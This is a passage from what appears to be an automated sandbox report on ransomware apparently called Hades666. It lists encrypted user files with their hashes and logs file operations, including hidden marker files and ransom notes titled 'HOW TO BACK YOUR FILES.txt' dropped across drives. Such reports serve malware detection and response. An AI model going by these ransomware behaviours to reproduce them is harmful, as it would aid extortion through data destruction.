SHA1: 7f39c6a0c22a909defb14a24b786d0f4538bfbcc
SHA256: 94b2818221d45af65fc7b6e1202b5a21b18b7cfb790e8da8a4c99d0c0a971b58
SSDeep: 96:/JJNs8nG2Jq6E+YflfFLzm7lr6muOdquG1vUTXOZ6Y:dP9E+YflNaQOkzogt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\319f01bf9fe00f2d.automaticDestinations-ms.Hades666 4.25 KB MD5: 2f3089c4e6b9b362d6dee917c5009b8e
SHA1: 5f90395ef142d9f1c1f7b361f1ea55fe4b71e984
SHA256: 37258827b7ce20500795138cea9b1d76c00f45d9aa7a1e3d5b588444d53d469e
SSDeep: 96:Q+i02VmaEzqqn2yHcg7Wp89UVw40VXopaI7NOZ6Y:Fi1nEmqn1HcgqzVw40VXoj7Gt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\61ebb1e65cfcb8da.automaticDestinations-ms.Hades666 3.25 KB MD5: 841629b87bfff1a5e4ffc822682e8d63
SHA1: 1953c70ca75c759611cc396507b91460463a2215
SHA256: 06a690a4c98585edbd6082146422bae74df90c2252054f2ad9640e2049054ad3
SSDeep: 96:e8n2VuIdyKS9VY6HrK5sq4d4ObWCXD/RjkTkyOZ6Y:eFVuIm1LKCqzOqc5jkoNt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6824f4a902c78fbd.automaticDestinations-ms.Hades666 3.25 KB MD5: 3727c61f8246f979921a3486d0e77375
SHA1: caa8b036b97c99dc9fe565b83eaf0ca57d197dfd
SHA256: e86d50724e0a2098805d0e6671b7b2d79a9619730622d3be8cb5cecc9b8b29d1
SSDeep: 48:dACS/B6Sw7r3mb9N/AYMc5n9SwVV80KNoWiIxzikC+hw3WngGElr87JwmH7gOgcj:d9S/Ezy9Bp9RV80xCnoGnSw7Jw1OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\6d2bac8f1edf6668.automaticDestinations-ms.Hades666 3.25 KB MD5: d689b148e4c015880d9d86875e54ae27
SHA1: 558b6e1217624caeb1673eedc53d76070a1b0ff3
SHA256: 3e7aed508120e6f05f6cd82daf6eec7c97a31192b6a4cc05b736a466d2d2f7ad
SSDeep: 48:XUFdI8CqnB68FZ1a3FMJ4Ap/iM/82PxwPF+SPJGUhQonmSIlXcWHVOgcZVuqIT9a:6Iod8uJppnLPxwPISPVQo9Ih1OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms.Hades666 8.75 KB MD5: 3a373265b0be39bd0d04729642db17ca
SHA1: ca08525559fb38a40f6dc762ccd21cf1a74595d6
SHA256: 7db3d418e03f3ef9ae9930fd31470ea08d0f19e97d23932bafb7a9bffe9ec627
SSDeep: 192:G/4F9QKd1mLxBcUqMoQRhJwcj9EmjWd5/qcvyGfkR9tpkt:pFeo1mtBcUqMnw09EmjmqkyGfkR9G
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\80d13f95c2c02af9.automaticDestinations-ms.Hades666 3.25 KB MD5: c187048c7385d4b9d8b6e0edd8861f97
SHA1: 7d49e1f171056ba375d19e1b1a79512ef210c207
SHA256: 7db6aff2346c55d1f8e5817885d27e57cc30c2e041d0e788cde24d749321b066
SSDeep: 48:hjEEQdXHni26lf9/y8fIgbEppM9ijETjhG+PnrSuB/fiHP53DwUGqaITOgcZVuqP:NEJdXHiZhtf8pVgToSFihcU1a8OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms.Hades666 3.25 KB MD5: 2b0a4b01746046c853baba070c145fdc
SHA1: dbccfdec2d9837835784fdb299c46022821dc011
SHA256: d0b395169a91779e889dc23700d7b44b615cd8f09f9b589494d07a720bc7aa49
SSDeep: 96:ifpiEzg2/JnrII9/rNbnfOyYEDc38bI+Mn9NgOZ6Y:ifpJzzBEI9/rtfdc8In9NTt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms.Hades666 3.25 KB MD5: a2b36581b505c3381b8584d836d1149e
SHA1: aeb7d30f4e7637e47dacd5fa05bb4998b1ee8e91
SHA256: 6050a85756e9c0eccba6f05f0a639214bdb00dc43e6c0ca2595623e85f0aa15a
SSDeep: 96:ym00EwGvPhJ+mv2kOONb2gCHlnT1mKTw/chYYiMdNOZ6Y:ymQXvzv2k6gCHlnTfT1YYBdGt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms.Hades666 3.25 KB MD5: 481965df2b3a1f5b4e038ba0871647ba
SHA1: 96862d62c3e56575f1b0f373daaadb8059e15067
SHA256: e40dd7d80feb545b028fc436486751cbf69aa3da1966dba455d7f4b14f808c25
SSDeep: 96:N8v8EjhMbkwaS+adlMteEFo4BvafHFOZ6Y:N8vKbkwRMYEZBva+t
False
C:\Documents and Settings\FD1HVy\Pictures\1Rut_CZp95E3.png.Hades666 78.25 KB MD5: 913a2e703eec63bd6bb8a8c1c64dac43
SHA1: 26864810bd1e0faf1ca0fd5ca9278423d1e30378
SHA256: 2388f09c47fa9491b8f9c19f85b03bcbcf6299449c824b55eb53bf9d01fffc38
SSDeep: 1536:9xlU+pV/KWlIGb3jBkCwBMmQE3xaV1UU4YS6P4cAEp2thbH/c+Am:BUYtHRmRK1E3S1UU4ZYp27bEbm
False
C:\Documents and Settings\FD1HVy\Pictures\2dOcoM_aN0.png.Hades666 59.75 KB MD5: 065cdbf2b84c3211ac551e62c8837bec
SHA1: 4d95fb8223ec0fc35e9068c231bd7ca4491f5137
SHA256: 0c963995c7343fadda313978a24f0a24a8b33402cd0b6a1595f13bfa956c36ea
SSDeep: 768:CapeDBbKFELko+NAe7kVnCsTxBa3LnwE7IN4vbtWdzx2QgH9bp+XUPeG54xldmR:CaoxrWA7abr7IuDtue9QUPeGRR
False
C:\Documents and Settings\FD1HVy\Pictures\eKa9s0OxrKnuzW9m_jl.bmp.Hades666 95.12 KB MD5: f28d3e678322d10076fb37d39605167f
SHA1: 7383ffa8879731f0e99d4235548c052a211ab3c1
SHA256: 15e2c58b217544557bc6be33a7324836fdf36bd78302f3436e377e5acdb0edf6
SSDeep: 1536:xNt/RzoVp3uwzs8rwfR0lRA3FYkKnIlFEbgp+PKAwwHR8yuXi2/dPYGXW:xN1RWixfR0TAVYxIIcsPoXyctPYF
False
C:\Documents and Settings\FD1HVy\Pictures\Ex pA.jpg.Hades666 15.38 KB MD5: 3fac1c49bf37c0680c93b7d41c9d810e
SHA1: c5a5a95cfba32e5af3c30d5a25047fb1122c7ef2
SHA256: cb23ea7e28d69dd5e0ec7d0fec5b82e1f2fc6c52a783d2320c2b2e677ee11b8c
SSDeep: 384:oudHW4bkkhxr92fsZLbcwuFmysi9tYESGIiqmXVj9lBsl/wV:o7yxJYaPc1FmyLhIhwj9lBsVwV
False
C:\Documents and Settings\FD1HVy\Pictures\JSELpO-F0Y.bmp.Hades666 21.97 KB MD5: 0f56571e8f38ad7ab89db079c14ba3d7
SHA1: 6269229c22176c0ebc3650c5624e6f2be9f82b98
SHA256: 65898f6562a392fdded1daea72bab29c1edb4213954bbfa1ef4ac9138ee087d0
SSDeep: 384:cEJAo14G0swe0ucn5HPYBlSRCEmbs25x7n/EbHS832Yix1Vqqp6GvtwIYhp:P2o14Ls90D5w6CE52Lb/EbHSEy1oqteX
False
C:\Documents and Settings\FD1HVy\Pictures\kuXIqR7PtqeMEg4X.gif.Hades666 49.09 KB MD5: dc7994577f29503cd21834a795bfb056
SHA1: a525512845e174474742bf1eca826c70a9871a05
SHA256: b4ebc94b270d747c30c099406925c2ab739e575e43c6266fae8c19f3cf6dab51
SSDeep: 768:j5XEzNm6GZpQp9aEY6mnmbmksFKgrKNaI3vh4VqXC7vNukDvtavMIgbiU+p:tXEzlO+f5a0eAgvUQaUfih
False
C:\Documents and Settings\FD1HVy\Pictures\Lf YVLL3lHH9mBY.png.Hades666 9.19 KB MD5: 1b8c251308fa0d9e21fdbcee3ba02a42
SHA1: c64be35dee3a7e32a9ead09bd1f2e6a707d72ffc
SHA256: 7bcdfb0046abb58b0d65347295e75d5c2601766b3fb056834b6f498340c91c1c
SSDeep: 192:/zxjTXXzLR44NyLNN6D8TnHIs0bzW6RgRbY7gd0c3ddCt:bxfCNNo6HEzuY0Ct
False
C:\Documents and Settings\FD1HVy\Pictures\Sv PS_0og2kRetH-P.jpg.Hades666 59.05 KB MD5: b228afc5f9b5c0e1a254b3fd4c5f16da
SHA1: 42ba9027b2b77bfc167588ce317b69e3d5da40ac
SHA256: 3d3005b2375148ba583a5cea2898c777cf758beec3b9748d1d9a8167a681e62a
SSDeep: 1536:k08zlHXLpWBxgRUbhjBdwOUderCWQhYxed/8:y7pWBuUbhjBuLeq8O/8
False
C:\Documents and Settings\FD1HVy\Pictures\t6mmG49Ik.bmp.Hades666 72.17 KB MD5: 1472bf46d7aeff17251dfb11f8a5b972
SHA1: 4d4535e47e6fcff5298b50702165bbec9f6063f0
SHA256: eeb2afd1a8effe71095c2f2be568e43b09ee5dee8e6742683aee25490b34e891
SSDeep: 1536:IgUXWHseuzT0w7CLwDPTr9hd/r5A5Krtp1kHh0XXUtqlUjaNLlasVB/+tCe:IggWHseuzYwGqdeSB0tql3NLnBK
False
C:\Documents and Settings\FD1HVy\Pictures\UpDUBx3NVg2.gif.Hades666 80.84 KB MD5: 064b7914d3ce8e90f8ffe7d4af9f87d4
SHA1: 26c0b9d0c883ab00c8e522fae3c5eb7661463000
SHA256: ce0d8cfdd24cd3b3566a78698e429477b4e8cba9988f1ddadaed110c8226f856
SSDeep: 1536:GGV+zzI7u5S+svCbLxODwGXOlwmpx2/bkbdWX1IcjY2YONjBZ+GAsj1Pek+8rwW1:w471+vkDLXQwmpxo+chtj1Awo/jWgJ30
False
C:\Documents and Settings\FD1HVy\My Documents\IZ-akFBweN.xlsx.Hades666 77.84 KB MD5: e56960b4bb31a62f273d5615b8198ed8
SHA1: 63ce378ed46aa4e3968b1a15aa55f5239347e40d
SHA256: ee889fc74ee895e0516a91c5c9614caec46575b0ad90a9794e7bc935fefc84a7
SSDeep: 1536:uaenYe6rEJTFbDoS0nSwRDCdLKDSAsieQYSkP/qWZ7ezBDVTMyYNXo3lHgBP4bS5:uTnYeQcF3l0SEEI4ie/SkP/qWJKIyYxf
False
C:\Documents and Settings\FD1HVy\My Documents\X08ymPxkbPs3266F.docx.Hades666 82.17 KB MD5: 204c765ec71a3661ebaa666ef94cf810
SHA1: 87867baab52f8b704afa8d523751e4f4984bd0ce
SHA256: b73cce3c0f9520772f96f41084d25b6ff1f358304fede283c0a047ad9fc0c8c3
SSDeep: 1536:9jfnOALggq+Rno0MNmcz4giL1dhKmPWG9lgSflDO4fMfTR0Oh+xlqGERm7VIGM:9jVgX4o4hCmPb9KBRlh+xlqGPIv
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\AP 8gy4K.mp3.Hades666 5.50 KB MD5: e02b5e1331dcf9ab57076dcd486b5152
SHA1: e951d447e18461b2ea4dc76befa1b70fcb381d2a
SHA256: 6de28d992ca3fdd6740e77b5fbfa67f25a8966356d5cd51de1d779612774a616
SSDeep: 96:28nMZAImrwDtv34rQcWk9/MBbGPkYHgoqE0byQ3x4ZdPjMTnHsfjZbIf8QOZ6Y:J+a4Z3e5bKwkYHg20bJMKaQ2t
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\hgiHJqZpAffsk9Ayx5.wav.Hades666 34.08 KB MD5: cb89f4e2d40ac2172bd44822ada7dce5
SHA1: baf94e1753869b1e71762f4bc76250235786fe11
SHA256: d53b7382bb5cf7c4fe052948e087dfea4ce2fb93f1752c95ba0b1c558eb77611
SSDeep: 768:eEZ9XGFc6XvZW5HWAfH60J+c3B8Glmx8V93qHaf2B5Bfn3HB8J6y:e+VOvvZW52EXJ+c3B8GAx8VRqHNrPRk
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\Ih S7fXaLxmtXo.m4a.Hades666 7.53 KB MD5: fcebdb11be9426b255b8e559fd272ae3
SHA1: e8f21b11a40a42e9933fbcd29d327adf8ce4d16a
SHA256: c866eba8647c33bff57eba84dd97c5a314f3e65fc90896f56e0aef9b8c9766be
SSDeep: 192:5hOO9zOZIxtYe8+7LW9ErrAoNCe1gBx3RfnBfgZkB04/Ajt:GOYZmYe8+7aEgoNP1gBFbf/7/AB
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Vpn2Jrp.m4a.Hades666 53.34 KB MD5: fdc07f41a27703b23ca3ae502d868477
SHA1: 76287bd29741ae5d0fd5eb8401b8379c0d57b9b5
SHA256: f558d27637b8cf1cc65ebfa09ee7984fbbd8c5c051c7131e8f61c7f21904bef2
SSDeep: 1536:l0uL+lq9AJObAYQSeAbFcuaEgepWyTU96w:lfL+lq9vbKTAeu8epWyI96w
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\Pru_HSlVaZZy\Z47-Ha4h.mp3.Hades666 78.25 KB MD5: fa42ab266274557d9cec6696762556df
SHA1: ead8a63b338e735299329ecf6be772d4b23a78c2
SHA256: ccb0dba9be9f1c1afc4491b09efa75c7578e9a0da8ae03aa00a80ce44e4f9ed4
SSDeep: 1536:CUUhYORvvD5fglntQYCmpDZ6POAPpSQyygpC0m1wOV+9hDXM1VC1Kq+Ng:CxLRD5fgltQPmTmOSRgppOQ/Xp9
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\n7-N9O.mp3.Hades666 16.27 KB MD5: e970d19b20d9c8aee170e94bedffe1c3
SHA1: 66ff9b17e2aaba5d68e6667a6b71cabda2ecb6fa
SHA256: 79cc3a00dc4ef16dd12d772a80a739b06124c6be3237b6d686be26deac2f7b74
SSDeep: 384:HsHZ4rCX6Ogy/0I7LrNCiJ+ELsK1dsef95HXdbMVA:Hs54CoycIRCD+sK1dseLNbMm
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\sMCkH-pugJ7KJz.m4a.Hades666 8.70 KB MD5: 0f5a6ccba9589ed50f2c3214a8794271
SHA1: 258bdf357e91690f16d03ce08bb998891e5f06cc
SHA256: ee4db10da1baefbce714afa01752f9766883b857da2b952688c98d2a60aa9028
SSDeep: 192:wsx86EQQJ9RtN7l3VNcm1JYuFac52JbBAPivmt:XxNEJpN7l3VLcls+6PivU
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\L1V20aHJ_D\PYCtA9-TE0M\VnEX 9WW6p4i-Twwhx.m4a.Hades666 51.25 KB MD5: 5ea3f3c8704dae1d426178ee24f1f01e
SHA1: 715af62af23667727350f8113aca62b8c13d0a71
SHA256: 0a245caaf7c0e9d301ff27465a0407b0bdc757abdf6782cf45bc8acb30d5911a
SSDeep: 1536:oTp85pmhit9aVayVA9XKdaQo8vr/DUoPriSF:whit9Kbi9lpkDUgriM
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\k-4gMU az_fjNHgxABE6\PC s _86v5QYC.wav.Hades666 10.53 KB MD5: 6dcf2d9acd19db84d6cb61ced822cc94
SHA1: e1549079bee38ca4c5ce2a95bd8b31fc8f3501bd
SHA256: c60e5536013bc507029e2fb3de5da9323bff89688a9f74d2e57961ef6589f739
SSDeep: 192:1rZkWsLIl26nvxrfboh4stQUzLy6/Fjv1JCOQRh9FFit:1mEl26nVB/UzO6NL7URh36
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\VTuFplQwRU7kkKmscw.mp3.Hades666 36.50 KB MD5: 4476ef0d88e31f9c465ae6e91fd6e7df
SHA1: a170cffddb9ae4ac5dc8dbf9e522934d0e1b61a2
SHA256: 3e19af8b4c41196a6d8ff8d5d298a15dbdeb5eab8fb7aba6e07b2788fd2735b2
SSDeep: 768:TnXBNkf5KesrKNaxAQZobyu7KsFaQnSCrZbWoxmYW7mzqV5zc:jTkf+KKAVWu7ZSCr0ZWqVFc
False
C:\Documents and Settings\FD1HVy\My Documents\My Music\SB9yfamy\HpsLEgt47dc\YIH0Q0N.m4a.Hades666 62.53 KB MD5: 18a97a83b66f8b52d7da9e6956ef7eb3
SHA1: c68edbb5037f2d1ef0197ceb3a646ab98a305960
SHA256: d0ecf7fee8675eb62b476cce09f437e17ff5553b902446d875fb77ad72770d78
SSDeep: 1536:TOCiBfW4nZwMwsyggcldQs/j8PTZSRlv1Si+63yTxP:T4tW4nSMByssIj8PTE31S76sp
False
Host Behavior
File (3830)
»
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\local\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\ProgramData\local\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 1
Fn
Create Z:\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\System Volume Information\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\System Volume Information\tracking.log desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\System Volume Information\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\$WINRE_BACKUP_PARTITION.MARKER desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\BOOTNXT desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\BOOTSECT.BAK desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 6
Fn
Create C:\Documents and Settings\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\bootsect.exe desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\DW20.EXE desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create Z:\Recovery\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create Z:\Recovery\WindowsRE\.DF7ADA61E0284DDD4F1E desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\boot.sdi desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\DWTRIG20.EXE desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\ReAgent.xml desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\Winre.wim desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\EnableWiFiTracing.cmd desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\GatherOSState.EXE desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\GetCurrentRollback.EXE desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\HttpHelper.exe desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\PostOOBEScript.cmd desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\upgrader_default.log desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\upgrader_win10.log desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\Windows10UpgraderApp.exe desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\WinREBootApp32.exe desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Z:\Recovery\WindowsRE\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\WinREBootApp64.exe desired_access = READ_CONTROL, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
